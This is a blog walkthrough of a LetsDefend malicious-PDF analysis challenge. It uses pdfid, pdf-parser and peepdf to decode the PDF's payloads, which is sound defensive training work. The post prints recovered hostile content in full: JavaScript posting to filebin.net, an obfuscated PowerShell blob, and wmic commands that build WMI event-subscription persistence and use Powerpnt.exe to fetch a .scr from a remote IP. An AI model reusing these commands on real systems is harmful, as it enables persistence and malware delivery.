PDF Analysis
Welcome back to yet another blog post, where I will be tackling a maldoc challenge from LetsDefend. This is a medium-rated challenge prepared by @DXploiter called PDF Analysis.
We are told that an employee has received a suspicious email with the following contents:
From: SystemsUpdate@letsdefend.io
To: Paul@letsdefend.io
Subject: Critical - Annual Systems UPDATE NOW
Body: Please do the dutiful before the deadline today.
Attachment: Update.pdf
Password: letsdefend
The employee reported this incident to us and mentioned that they did not download or open the attachment, as they found it very suspicious. With this in mind, I downloaded the attachment from Google Drive and extracted it with the password: letsdefend
1. What local directory name would have been targeted by the malware?
On my analyst workstation, we can start by running the file command to verify that it is indeed a PDF file. We can also examine the EXIF data to check for other interesting metadata.
From the above, we see that it’s only a one-page document. Let’s analyze the PDF further using the pdfid utility. In a previous blog post (Suspicious USB), I covered a couple of tools I use to analyze malicious PDFs. Give it a look if you want to learn more about them.
Executing the command shown below, we get:
➜  pdfid Update.pdf 
PDFiD 0.2.8 Update.pdf
 PDF Header: %PDF-1.6
 obj                   36
 endobj                35
 stream                 7
 endstream              6
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    0
 /JavaScript            0
 /AA                    0
 /OpenAction            3
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                2
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0
Let’s demystify what each of these means:
- PDF Header: %PDF-1.6 - Indicates that this PDF file uses version 1.6 of the PDF specification.
- obj 36 - Indicates that the ‘obj’ keyword appears 36 times. Each one opens an indirect object. Indirect objects are the building blocks of PDF files and can contain various data such as images, text, or even other PDFs.
- endobj 35 - Indicates that there are 35 ‘endobj’ keywords, each signifying the end of an indirect object. This is one fewer than the obj count, whereas the two normally match.
- stream 7 and endstream 6 - Indicate that there are 7 ‘stream’ keywords and 6 ‘endstream’ keywords. These encapsulate data within the PDF, which can include image data, embedded files, or even code.
- xref 1 - Indicates there is 1 cross-reference table, which is used to locate objects within the file.
- trailer 1 - Indicates there is 1 trailer. The trailer contains additional information needed to correctly parse the PDF.
- startxref 1 - Indicates there is 1 ‘startxref’ keyword, which tells a reader where the cross-reference table begins.
- /Page 1 - Indicates that there is 1 page object. This object is part of the logical structure of the PDF and represents an individual page.
- /Encrypt 0 - Indicates that there are no encryption objects. If this were above 0, it would mean the PDF is encrypted, which can sometimes be a red flag 🚩 for malicious content.
- /JS 0 and /JavaScript 0 - Indicate that no JavaScript objects or sections were found. JavaScript within a PDF can sometimes be used for malicious purposes.
- /OpenAction 3 - Indicates that the /OpenAction keyword appears 3 times. /OpenAction defines an action that is performed automatically when the PDF is opened. This is something to be cautious of, as malicious PDFs often use it to execute code upon opening. 🚩
- /Launch 2 - Indicates that there are 2 launch actions. These can be used to run an application or execute code, and are often associated with malicious PDFs.
- /EmbeddedFile 0 - Indicates that there are no embedded files within the PDF.
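To make the counting idea concrete, here is a minimal Python sketch of what this kind of keyword triage boils down to. It is not pdfid’s actual implementation: the `count_keywords` helper and the sample bytes are made up for illustration, and the sketch ignores name obfuscation (for example hex escapes such as /J#53 for /JS).

```python
import re

# Names commonly checked during PDF triage (a subset of what pdfid reports).
KEYWORDS = [b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/Launch", b"/EmbeddedFile"]


def count_keywords(data: bytes) -> dict:
    """Count occurrences of each keyword in raw PDF bytes (hypothetical helper)."""
    counts = {}
    for keyword in KEYWORDS:
        # Reject matches followed by a letter or digit so /AA does not match /AAA.
        pattern = re.escape(keyword) + rb"(?![A-Za-z0-9])"
        counts[keyword.decode("ascii")] = len(re.findall(pattern, data))
    return counts


# Hypothetical stand-in for a real file; in practice, read Update.pdf in binary mode.
sample = (
    b"%PDF-1.6\n"
    b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /Launch /Win << /F (cmd.exe) >> >> endobj\n"
)

for name, count in count_keywords(sample).items():
    print(f"{name:<15}{count}")
```

Any non-zero count for /OpenAction or /Launch is a cue to look at the referencing objects more closely, which is what the next tool helps with.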
With that in mind, we can also use another tool called pdf-parser to analyse the PDF’s statistics.
pdf-parser is a Python script that can be used to parse PDF documents and analyze their structure. This tool is particularly useful for analyzing suspicious or malicious PDF files, or for exploring the internals of a PDF document. It is part of the DidierStevensSuite, a set of Python tools developed by Didier Stevens for handling various file formats.
We can append the -a switch, which displays stats for the PDF document:
➜  pdf-parser -a Update.pdf                
This program has not been tested with this version of Python (3.10.9)
Should you encounter problems, please use Python version 3.10.4
Comment: 10
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 35
Indirect objects with a stream: 2, 5, 8, 10, 13, 33
  28: 2, 3, 5, 6, 8, 10, 11, 13, 19, 15, 16, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 34, 35, 36, 33
 /Catalog 1: 17
 /Font 2: 9, 14
 /FontDescriptor 2: 7, 12
 /Page 1: 1
 /Pages 1: 4
Search keywords:
 /OpenAction 3: 19, 26, 17
 /Launch 2: 19, 26
Here, we get pretty much the same info.
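One detail worth pulling out of the pdf-parser stats is which objects appear under both /OpenAction and /Launch, since those would launch something as soon as the document is opened. A small Python sketch of that comparison follows. The two lines are copied from the output above, while the `parse_keyword_line` helper is hypothetical.

```python
# The two "Search keywords" lines from the pdf-parser -a output.
stats_lines = [
    " /OpenAction 3: 19, 26, 17",
    " /Launch 2: 19, 26",
]


def parse_keyword_line(line):
    """Split '/Name N: id, id, ...' into the keyword and a set of object IDs."""
    name_part, ids_part = line.strip().split(":", 1)
    keyword = name_part.split()[0]
    object_ids = {int(item) for item in ids_part.split(",")}
    return keyword, object_ids


objects = dict(parse_keyword_line(line) for line in stats_lines)

# Objects that are both auto-triggered and launch actions.
both = objects["/OpenAction"] & objects["/Launch"]
print(sorted(both))  # [19, 26]
```

Objects 19 and 26 carry both keywords, which makes them the natural candidates for closer inspection.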
So what next?
Let’s try running strings on the PDF and see what we can find.
Right off the bat, we see a PowerShell command with the -EncodedCommand parameter, which allows you to pass a Base64-encoded command to PowerShell for execution.
Let’s decode this:
We get a weird string. It took me a moment to realise that the string is reversed, so I used the following CyberChef recipe to clean it up.
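For anyone who prefers a script over CyberChef, the same two steps can be sketched in Python. PowerShell’s -EncodedCommand expects Base64 over UTF-16LE text, so the decode step uses that encoding. The real payload from the challenge is not reproduced here: the sample command and both helper names are hypothetical.

```python
import base64


def decode_encoded_command(b64_text: str) -> str:
    """Decode a PowerShell -EncodedCommand value (Base64 over UTF-16LE)."""
    return base64.b64decode(b64_text).decode("utf-16-le")


def unreverse(text: str) -> str:
    """Undo a simple character-order reversal."""
    return text[::-1]


# Hypothetical sample: a harmless command, reversed and then encoded,
# standing in for the string recovered from the PDF.
sample_plain = "Write-Output 'hello'"
sample_b64 = base64.b64encode(sample_plain[::-1].encode("utf-16-le")).decode("ascii")

decoded = decode_encoded_command(sample_b64)
print(decoded)             # still reversed at this point
print(unreverse(decoded))  # readable command
```

If the first print looks like gibberish that reads correctly backwards, that is the same tell that the CyberChef Reverse operation takes care of.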
Here, we get the local directory that would have been targeted by the malware:
C:\Documents\
2. What would have been the name of the file created by the payload?
From the DestinationPath shown above, we see that the name of the file created by the payload is D0csz1p
D0csz1p
3. What file type would this have been if it were created?
Looking carefully at the payload name (D0csz1p), it read like Docs.zip to me, so I submitted zip as my answer. 🙂
zip
4. Which external web domain would the malware have attempted to interact with?
Inspecting the strings further, we get:
This looks like obfuscated JavaScript that uses a technique known as a packed script. In this obfuscated code, an eval function is what executes the deobfuscated JavaScript.
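A quick way to flag this pattern in a pile of extracted strings is to search for the packer’s wrapper. The sketch below assumes the common `eval(function(p,a,c,k,e,d)...` style of packer. The original code is not reproduced in this post, so both the signature and the sample string are assumptions for illustration.

```python
import re

# Wrapper signature of the common "p,a,c,k,e,d"-style packer (an assumption here).
PACKER_RE = re.compile(
    r"eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*[dr]\s*\)"
)


def looks_packed(js_source: str) -> bool:
    """Return True if the JavaScript source starts a packed eval wrapper."""
    return PACKER_RE.search(js_source) is not None


# Hypothetical samples: one packed-looking wrapper and one plain statement.
packed_sample = "eval(function(p,a,c,k,e,d){/* body elided */}('...',10,2,'a|b'.split('|'),0,{}))"
plain_sample = "var url = 'https://example.com';"

print(looks_packed(packed_sample))
print(looks_packed(plain_sample))
```

A match only says the wrapper is present. Recovering the next stage still needs a JavaScript-aware tool.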
Interestingly, pdfid and pdf-parser didn’t pick up any JavaScript objects or code.
Let’s use another tool called peepdf.
Executing it with the -i flag drops us into interactive mode, and -f tells it to ignore any errors.
From the screenshot above, we now see 2 objects with JS code.
If we use the js_code command with the ID of an object containing the JS, we get the original and next-stage code.
var url = "https://filebin.net/0flqlz0hiz6o4l32/D0csz1p";
var xhr = new XMLHttpRequest();
xhr.open("POST", url);
xhr.setRequestHeader("Content-Type", "application/octet-stream");
xhr.setRequestHeader("login", "");
xhr.setRequestHeader("password", "");
xhr.onreadystatechange = function() {
    if (xhr.readyState === 4) {
        console.log(xhr.status);
        console.log(xhr.responseText);
    }
};
var data = '{"login":"","password":""}';
xhr.send(data);
This looks like it is making an HTTP POST request to hxxps://filebin.net/0flqlz0hiz6o4l32/D0csz1p using the XMLHttpRequest object. It also looks like it’s sending JSON data with empty login and password fields. The response status and response text are logged to the console.
From the above, we get the answers to questions 4-6:
filebin.net
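When there are many URLs to go through, pulling out the domain and defanging the URL for a report can be scripted. The sketch below uses the URL from the decoded JavaScript. The `defang` helper is a hypothetical convenience that only rewrites the scheme, matching the hxxps style used in this post.

```python
from urllib.parse import urlparse

# URL taken from the decoded JavaScript above.
url = "https://filebin.net/0flqlz0hiz6o4l32/D0csz1p"
parsed = urlparse(url)


def defang(value: str) -> str:
    """Rewrite the scheme so the URL is not clickable in reports."""
    return value.replace("http", "hxxp", 1)


domain = parsed.hostname
last_segment = parsed.path.rsplit("/", 1)[-1]

print(domain)        # filebin.net
print(last_segment)  # D0csz1p
print(defang(url))   # hxxps://filebin.net/0flqlz0hiz6o4l32/D0csz1p
```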
5. Which HTTP method would it have used to interact with this service?
POST
6. What is the name of the obfuscation used for the Javascript payload?
eval
7. Which tool would have been used for creating the persistence mechanism?
On further inspection of the strings, we get another blob of PowerShell shenanigans.
Normally, I would execute this on my test Windows VM, but I accidentally deleted it 😬. Not to worry, we can execute it with PowerShell in our Kali environment.
In the screenshot above, I have separated the commands into 3:
─PS> $best64code = ("{5}{0}{2}{30}{12}{1}{14}{15}{6}{21}{31}{20}{10}{28}{7}{24}{11}{13}{22}{25}{17}{3}{19}{8}{4}{23}{26}{9}{16}{18}{27}{29}"-f 'mTuIX
Z0xWaGRnblZXRf9lI9','atdnCNoQDiI3Yz','IXZ0xWaGBSRUFURSNEIn5Wak5WaCJXZtV3cu92QvRlclRHbpZ0XfBCSUFEUgIibvlGdwlmcjNnY1NHX092byx','EIlNmbhR3culEdldmchRFIFJVRIdFIwAD','F','=IiIcp
Gb2dkYaN3VIJlIc1TZtFmTuIXZtV3cu92Q05WZ2VUZulGTk5WYt12bDJSPyVWb1NnbvNEIsIiIcN2ZJV1alFlZHVmIc1TZtF','h2YhNUZslmRlNWamZ2TcBjL2EDXlNWamZ2TcRnZvN3byNWaNxFbhN2bMxVY0FGRwBXQcVSRMl
kRPJFUSV0UVVCXzJXZzVFX6MkI9UGdhx','vJHXlNWamZ2TgQnZvN3byNWa','Zv1UZj5WY0NnbJ91Xg00TSZEIqACVDVET','dn5WYMl','Wb','LioGb2dkYaN3VIJlI9UWbh5EIFRVQFJ1QgIXZtV3cu92Q05WZ2','gMW','
VUZulGTk5WYt12bDBCSUFEUgIibvlGdwlmcjNnY1NHX092byxFXioTRDFEUTVUTB50','5iM4Qjc','lBXYwxGbhdHXl','nclVXUsIiM21WajxFdv9mci0TZjFGcTVWbh5EduVmdFBCLiM2ZJV1alFlZHV','UfJzMul2VnASQT
l','mI9UWbh5EIFRVQF','M5AiTJhEVJdFI05WZ2VkbvlGdhNWamlG','Rmbh1','GctVGVl5W','LgMWatdnCNoQDicSblR3c5N1XT9kZyVGUfFGdhREZlRHdh1','NlI9knclVXUgwiIMF1Vi0T','Nx1clxWaGBSbhJ3ZvJHU
cpzQi0Da0FGUlxmYhRXdjVGeFBC','mcvZkZyVG','ZnFW','J1QgIXZ0xWaGRnblZXRf9F','vNELiAyJyN2cuIDO0IXZwFGcsxWY39CN14CN4EjL3gTMuAjNv8iOwRHdodCIlhXZuQnbwJXZ39GUcZTMlNWamZ2TcR3b','IIR
VQQBiIu9Wa0BXayN2ciV3ccR3bvJHXcJiOFNUQQNVRNFkTvAyYp12d','FXioTRDFEUTVUTB50L','aM')
─PS> $base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null
─PS> $LoadCode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$base64"))
─PS> Write-Output $LoadCode
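The PowerShell commands above peel off three layers: the -f format operator reorders the chunks, the result is reversed, and the reversed text is Base64-decoded as UTF-8. For readers without PowerShell at hand, here is a rough Python equivalent run on a toy input. The `deobfuscate` helper and the sample chunks are hypothetical, and the real template and chunks from the PDF would be passed in the same way.

```python
import base64


def deobfuscate(template, chunks):
    """Undo the three layers: reorder chunks, reverse, Base64-decode."""
    # Plain {n} placeholders behave like PowerShell's -f operator here.
    reordered = template.format(*chunks)
    base64_text = reordered[::-1]
    return base64.b64decode(base64_text).decode("utf-8")


# Build a toy obfuscated sample from a harmless string.
plain = "wmic /?"
reversed_b64 = base64.b64encode(plain.encode("utf-8")).decode("ascii")[::-1]
parts = [reversed_b64[0:4], reversed_b64[4:8], reversed_b64[8:12]]

# Shuffle the parts and use a template that puts them back in order.
template = "{2}{0}{1}"
chunks = [parts[1], parts[2], parts[0]]

print(deobfuscate(template, chunks))  # wmic /?
```

Doing the decoding in Python also avoids executing any part of the sample, since nothing here is ever run as PowerShell.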
Launch PowerShell and run the commands shown above.
From the output, we now have readable commands, which we will break down shortly:
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="eGfQekUIgc", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 9000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="RHWsZbGvlj", ExecutablePath="C:\Program Files\Microsoft Office\root\Office16\Powerpnt.exe 'http://60.187.184.54/wallpaper482.scr' ",CommandLineTemplate="C:\Users\%USERPROFILE%\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\wallpaper482.scr"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"eGfQekUIgc\"", Consumer="CommandLineEventConsumer.Name=\"RHWsZbGvlj\""
We see that WMIC (Windows Management Instrumentation Command-line) has been used to create persistence.
In the first command, an event filter is created. An event filter is basically a condition that waits for something specific to happen. It has been given the name eGfQekUIgc, and the event namespace root\cimv2 is specified. The query language is WQL (WMI Query Language), and the query is SELECT * FROM __InstanceModificationEvent WITHIN 9000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'. This query matches any modification event whose target instance is of type ‘Win32_PerfFormattedData_PerfOS_System’, and it polls every 9000 seconds (9000 / 3600 = 2.5 hours).
With this in mind, the answer to question 7 is wmic, and the answer to question 8 is 2.5 hours.
wmic
8. How often would the persistence be executed once Windows starts? (format: X.X hours)?
2.5 hours
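The interval can be double-checked by pulling the WITHIN value out of the query and converting it. This is a minimal sketch, and the regular expression is just one simple way to grab the number.

```python
import re

# WQL query from the __EventFilter command above.
query = (
    "SELECT * FROM __InstanceModificationEvent WITHIN 9000 "
    "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
)

# WITHIN gives the polling interval in seconds.
match = re.search(r"\bWITHIN\s+(\d+(?:\.\d+)?)", query, re.IGNORECASE)
seconds = float(match.group(1))
hours = seconds / 3600

print(f"{seconds:.0f} s = {hours} h")  # 9000 s = 2.5 h
```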
9. Which LOLBin would have been used in the persistence method?
The second command creates a command line event consumer. Basically, this is the action that will be performed when the event filter condition is met. In this case, the CommandLineEventConsumer is given the name RHWsZbGvlj. ExecutablePath="C:\Program Files\Microsoft Office\root\Office16\Powerpnt.exe 'http://60.187.184.54/wallpaper482.scr' " indicates that Powerpnt.exe will be used to download a file from the specified URL. This is a bit sus.
CommandLineTemplate="C:\Users\%USERPROFILE%\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\wallpaper482.scr" specifies where the downloaded file (wallpaper482.scr) will be saved on the system.
With this in mind, we know that Powerpnt.exe is a known LOLBin used to download payloads from remote servers.
For more information, feel free to check the LOLBAS project.
Powerpnt.exe
10. What is the filename that would have been downloaded and executed using the LOLbin?
<refer to explanation on question 9 above>
wallpaper482.scr
11. Where would this have been downloaded from? (format: IP address)
<refer to explanation on question 9 above>
60.187.184.54
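The indicators for questions 10 and 11 can also be extracted programmatically from the ExecutablePath value, which is handy when there are several consumers to review. The following is a minimal sketch: the regular expression is a simple assumption about how the URL is quoted and is not a general-purpose URL matcher.

```python
import ipaddress
import re
from urllib.parse import urlparse

# ExecutablePath value from the CommandLineEventConsumer command above.
executable_path = (
    r"C:\Program Files\Microsoft Office\root\Office16\Powerpnt.exe "
    r"'http://60.187.184.54/wallpaper482.scr' "
)

# Grab the first http(s) URL, stopping at whitespace or a quote.
url = re.search(r"https?://[^\s'\"]+", executable_path).group(0)
parsed = urlparse(url)

host = parsed.hostname
filename = parsed.path.rsplit("/", 1)[-1]

# Raises ValueError if the host is a domain name instead of an IP literal.
ipaddress.ip_address(host)

print(host)      # 60.187.184.54
print(filename)  # wallpaper482.scr
```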
12. Which country is this IP Address located in?
With basic tools such as whois, we can trace the IP address to China.
China
Troubleshooting peepdf issues
In order to get peepdf working properly, you need pylibemu and PyV8. Here’s how:
for pylibemu:
pip install pylibemu
for PyV8:
cd /usr/share
sudo git clone https://github.com/emmetio/pyv8-binaries.git
cd pyv8-binaries/
sudo unzip pyv8-linux64.zip
sudo cp -a PyV8.py _PyV8.so /usr/bin
sudo cp -a PyV8.py _PyV8.so /usr/lib/python2.7/dist-packages/
This brings me to the end of my blog post. I hope you got to learn a thing or two. I’m looking forward to doing and writing up more maldoc challenges like this one. If you found this helpful, feel free to share it with your networks, peers or on your socials.
Btw, if you have any questions, comments or feedback about this post, feel free to reach me on Twitter @oste_ke.

















